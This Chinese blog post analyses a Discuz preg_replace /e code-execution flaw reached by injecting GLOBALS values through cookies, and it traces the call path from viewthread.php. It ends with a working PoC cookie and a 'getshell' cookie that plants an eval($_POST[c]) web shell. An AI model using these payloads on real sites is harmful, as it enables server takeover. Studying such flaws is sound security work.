参考:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-080723.html

 

文件位于:include/discuzcode.func.php  第97-241行   函数 discuzcode() 

有这么一句话,$GLOBALS['_DCACHE']['smilies']['searcharray'], $GLOBALS['_DCACHE']['smilies']['replacearray']

$message = preg_replace($GLOBALS['_DCACHE']['smilies']['searcharray'], $GLOBALS['_DCACHE']['smilies']['replacearray'], $message, $maxsmilies);

然而在5.3.*中,$_REQUEST这个超全局变量的值受php.ini中request_order的影响,在最新的php5.3.x系列 中,request_order默认值为GP,也就是说默认配置下$_REQUEST只包含$_GET和$_POST,而不包括$_COOKIE,那么我们就可以通过COOKIE来提交GLOBALS变量了。(在5.3.29中默认是CGP)

为了演示漏洞就设置成GP。

 

$message = preg_replace($GLOBALS['_DCACHE']['smilies']['searcharray'], $GLOBALS['_DCACHE']['smilies']['replacearray'], $message, $maxsmilies);

 很典型的漏洞。preg_replace() 前两个参数可控,可就是说我们只要控制第一个参数是/e模式,第二个参数是我们要执行的php代码,就能构成一个后门了。

这里有个注意的点,就是不一定需要/e模式,

写个脚本跑跑看什么字符可以。

<?php
preg_replace($_GET['a'].'.*'.$_GET['a'].'e','phpinfo();','a',1)
?>

  

具体的有'"!@#$%^&*()-+等,但要注意传输过程中的转义。

通过cookie提交:GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

然后在调用discuzcode()函数的地方回显。

在/viewthread.php中  viewthread_procpost() 函数 第619-729行

在第725行调用了discuzcode()函数

	$post['message'] = discuzcode($post['message'], $post['smileyoff'], $post['bbcodeoff'], $post['htmlon'] & 1, $forum['allowsmilies'], $forum['allowbbcode'], ($forum['allowimgcode'] && $showimages ? 1 : 0), $forum['allowhtml'], ($forum['jammer'] && $post['authorid'] != $discuz_uid ? 1 : 0), 0, $post['authorid'], $forum['allowmediacode'], $post['pid']);

  

又在最前面的地方调用viewthread_procpost()函数

	while($post = $sdb->fetch_array($query)) {
		if(($onlyauthoradd && $post['anonymous'] == 0) || !$onlyauthoradd) {
			$postlist[$post['pid']] = viewthread_procpost($post);
		}
	}

  来到/include/discuzcode.func.php 当设置了$GLOBALS['_DCACHE']['smilies']的值以后,就能执行preg_replace(),造成代码执行。

	if(!$smileyoff && $allowsmilies && !empty($GLOBALS['_DCACHE']['smilies']) && is_array($GLOBALS['_DCACHE']['smilies'])) {...}

  

 

 poc:在cookie中添加:GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

然后访问任一个帖子。/viewthread.php?tid=13&extra=page%3D1 就能触发漏洞

 

 getsshell:GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval($_POST[c])%3B;

 


posted on 2017-05-29 20:05  羊小弟  阅读(1657)  评论(0编辑  收藏  举报